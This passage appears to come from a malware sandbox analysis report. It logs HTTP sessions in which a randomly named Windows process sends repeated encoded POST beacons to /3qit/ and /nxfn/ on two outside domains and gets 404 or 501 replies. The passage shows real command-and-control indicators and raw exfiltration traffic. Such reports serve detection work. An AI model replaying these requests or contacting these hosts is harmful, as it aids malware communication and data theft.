              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 59 52 51 59 55 77 50 69 65 4a 2b 36 55 53 66 51 79 70 69 67 67 4c 4b 41 4a 31 36 67 36 65 59 42 44 77 32 77 71 39 6d 72 68 55 55 73 57 59 45 73 77 3d 3d
              Data Ascii: H0QP6=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUYRQYUwPieJ+6USfQypiggLKAJ16g6eYBDw2wq9mrhUUsWYEsw==
              Sep 22, 2024 17:36:02.435503006 CEST | 1033 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:02 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              10 | 192.168.2.7 | 49720 | 172.96.191.39 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:04.071688890 CEST | 851 | OUT | POST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 7a 78 45 4c 52 4d 33 63 44 74 44 43 30 75 39 49 4a 48 30 57 78 2b 68 45 35 41 36 45 50 47 37 4a 48 31 57 6e 52 72 6b 71 34 31 71 41 4c 4c 6c 64 41 3d
              Data Ascii: H0QP6=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzxELRM3cDtDC0u9IJH0Wx+hE5A6EPG7JH1WnRrkq41qALLldA=
              Sep 22, 2024 17:36:04.981163025 CEST | 1033 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:04 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              11 | 192.168.2.7 | 49721 | 172.96.191.39 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:06.617681980 CEST | 1864 | OUT | POST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Origin: http://www.bola88site.one
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.bola88site.one/3qit/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 42 39 78 6c 4b 4c 50 68 52 44 69 68 54 43 49 34 46 61 78 4f 58 65 4c 51 77 6c 77 4c 74 62 78 6e 39 37 6d 47 78 31 79 44 43 58 6e 36 62 4c 62 57 52 4a 6b 50 52 36 77 7a 58 52 77 6f 48 4d 52 41 65 65 30 4b 4b 65 58 76 61 39 7a 53 43 30 63 44 38 56 65 79 6a 6e 35 4d 70 4c 50 62 61 52 74 34 63 5a 39 34 6d 2b 56 6a 53 74 4c 46 7a 6c 6d 50 75 61 6e 6e 52 66 62 2f 67 71 39 4a 57 2f 4c 5a 49 6a 65 6b 4d 43 63 51 75 5a 41 48 39 6a 76 58 69 33 30 58 4a 2b 64 59 4d 69 6d 4c 38 69 58 6f 6c 77 [TRUNCATED]
              Data Ascii: H0QP6=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 [TRUNCATED]
              Sep 22, 2024 17:36:07.506680965 CEST | 1033 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:07 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              12 | 192.168.2.7 | 49722 | 172.96.191.39 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:09.160659075 CEST | 565 | OUT | GET /3qit/?H0QP6=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:36:10.054687023 CEST | 1033 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Sun, 22 Sep 2024 15:36:09 GMT
              server: LiteSpeed
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              13 | 192.168.2.7 | 49723 | 217.70.184.50 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:15.159785032 CEST | 840 | OUT | POST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 55 64 5a 71 6f 51 70 6c 49 64 45 38 35 46 5a 65 75 35 51 74 79 4f 42 36 56 48 38 49 53 7a 59 6e 66 41 76 4e 73 52 36 4e 35 75 58 69 69 4c 44 43 41 3d 3d
              Data Ascii: H0QP6=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdUdZqoQplIdE85FZeu5QtyOB6VH8ISzYnfAvNsR6N5uXiiLDCA==
              Sep 22, 2024 17:36:15.771171093 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:15 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              14 | 192.168.2.7 | 49724 | 217.70.184.50 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:17.711430073 CEST | 860 | OUT | POST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 36 2b 58 6a 4b 66 30 75 74 6c 65 45 33 41 4f 6c 62 53 4f 4c 39 76 77 71 48 55 31 7a 49 79 6d 46 4a 6a 39 55 6d 75 7a 68 55 43 5a 33 54 4c 41 63 3d
              Data Ascii: H0QP6=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj26+XjKf0utleE3AOlbSOL9vwqHU1zIymFJj9UmuzhUCZ3TLAc=
              Sep 22, 2024 17:36:18.306798935 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
              Server: nginx
              Date: Sun, 22 Sep 2024 15:36:18 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              15 | 192.168.2.7 | 49725 | 217.70.184.50 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:20.256956100 CEST | 1873 | OUT | POST /nxfn/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.languagemodel.pro
              Origin: http://www.languagemodel.pro
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.languagemodel.pro/nxfn/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
